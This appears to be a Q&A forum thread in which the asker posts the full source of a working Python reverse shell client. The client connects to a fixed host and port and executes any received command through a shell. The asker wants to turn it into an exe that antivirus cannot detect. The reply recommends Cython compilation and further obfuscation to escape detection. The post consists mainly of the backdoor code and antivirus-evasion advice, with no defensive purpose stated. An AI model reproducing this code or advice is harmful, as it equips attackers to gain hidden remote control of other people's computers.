Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file

Question

When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus.

Here is my client file:

import os, socket, subprocess

s = socket.socket()
host = '192.168.1.81'
port = 9999
s.connect((host,port))

while True:
    data = s.recv(1024)
    if data[:2].decode('utf-8') == 'cd':
        os.chdir(data[3:].decode('utf-8'))
    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output_byte = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_byte,'utf-8')
        s.send(str.encode(output_str + str(os.getcwd()) +'> '))
    else:
        break

s.close()

How do I convert the file into exe so that it stays undetected like when is in its python file format .py?

Maybe the plain Python format isn't detected because the AV engines do not know how to execute it or read the source, but the pyinstaller binary can be statically and dynamically examined through normal means. — multithr3at3d, Oct 12 '20 at 04:32

score 1 · Answer 1 · answered Oct 11 '20 at 10:38

Many Python “exe” tools just package the script with a runtime. You may want to consider something like Cython that produces a C version that can be compiled directly to object code. I doubt your vanilla version will escape detection and my require further obfuscation.

Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file

1 Answers1